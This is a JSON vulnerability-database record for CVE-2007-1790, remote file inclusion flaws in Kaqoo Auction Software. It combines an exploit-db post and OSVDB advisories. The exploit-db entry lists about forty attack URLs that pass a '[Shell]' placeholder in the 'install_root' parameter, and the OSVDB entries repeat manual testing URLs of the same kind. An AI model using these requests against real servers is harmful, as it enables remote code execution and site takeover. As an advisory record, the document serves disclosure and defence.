{"exploitdb": [{"lastseen": "2016-01-31T18:53:54", "bulletinFamily": "exploit", "description": "Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities. CVE-2007-1790. Webapps exploit for php platform", "modified": "2007-03-29T00:00:00", "published": "2007-03-29T00:00:00", "id": "EDB-ID:3607", "href": "https://www.exploit-db.com/exploits/3607/", "type": "exploitdb", "title": "Kaqoo Auction install_root Multiple Remote File Include Vulnerabilities", "sourceData": "*************************************************************\nTo ConTacT mE @ www.Asb-May.net/bb\nScRiPt:-http://kaqoo.com/server/download.php\nGrEaTz To:-ToOofa-HaCk.eGy-Alk()mad()z-Bright Dark (All AsB-MaY DisCoverY\nExPloIts GrOup)\nDiscovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP} >>\n******************************************************************************\nWrong Code:-\ninclude_once(\"$install_root\n********************************************************************************\nExPlOiT:-http://www.SitE.com/include/core/support.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/function.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/rdal_object.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/rdal_editor.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/login.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/request.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/core/categories.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/save.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/preview.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/edit_item.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/new_item.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item/item_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/search.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item_edit.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/register_succsess.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/context_menu.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/item_repost.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/balance.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/featured.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/buynow.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/install_complete.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/fees_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user_feedback.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/admin_balance.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/activate.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/member.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/add_bid.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/items_filter.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/my_info.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/register.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/leave_feedback.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/display/user_auctions.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/design/form.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/processor.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/interfaces.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/left_menu.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/login.inc.php?install_root=[Shell]\nExPlOiT:-http://www.SitE.com/include/categories.inc.php?install_root=[Shell]\n********************************************************************************\n\n# milw0rm.com [2007-03-29]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3607/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/function.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/function.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/core/function.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34546", "id": "OSVDB:34546", "title": "Kaqoo Auction Software Free Edition include/core/function.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/processor.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/processor.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/processor.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34580", "id": "OSVDB:34580", "title": "Kaqoo Auction Software Free Edition include/processor.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/interfaces.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/interfaces.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/interfaces.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34581", "id": "OSVDB:34581", "title": "Kaqoo Auction Software Free Edition include/interfaces.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/member.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/member.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/member.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34572", "id": "OSVDB:34572", "title": "Kaqoo Auction Software Free Edition include/display/member.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/items_filter.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/items_filter.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/items_filter.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34574", "id": "OSVDB:34574", "title": "Kaqoo Auction Software Free Edition include/display/items_filter.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/register.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/register.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/register.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34576", "id": "OSVDB:34576", "title": "Kaqoo Auction Software Free Edition include/display/register.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/user_feedback.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/user_feedback.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/user_feedback.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34568", "id": "OSVDB:34568", "title": "Kaqoo Auction Software Free Edition include/display/user_feedback.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/item/item_info.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/item/item_info.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/display/item/item_info.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34556", "id": "OSVDB:34556", "title": "Kaqoo Auction Software Free Edition include/display/item/item_info.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/rdal_object.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/core/rdal_object.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/core/rdal_object.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34547", "id": "OSVDB:34547", "title": "Kaqoo Auction Software Free Edition include/core/rdal_object.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "## Vulnerability Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/design/form.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nKaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/design/form.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/include/design/form.inc.php?install_root=[Shell]\n## References:\nVendor URL: http://kaqoo.com/\n[Secunia Advisory ID:24696](https://secuniaresearch.flexerasoftware.com/advisories/24696/)\nOther Advisory URL: http://milw0rm.com/exploits/3607\nISS X-Force ID: 33335\nFrSIRT Advisory: ADV-2007-1180\n[CVE-2007-1790](https://vulners.com/cve/CVE-2007-1790)\nBugtraq ID: 23211\n", "modified": "2007-03-29T07:49:37", "published": "2007-03-29T07:49:37", "href": "https://vulners.com/osvdb/OSVDB:34579", "id": "OSVDB:34579", "title": "Kaqoo Auction Software Free Edition include/design/form.inc.php install_root Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2007-04-02T00:00:00", "published": "2007-04-02T00:00:00", "id": "SECURITYVULNS:VULN:7521", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7521", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}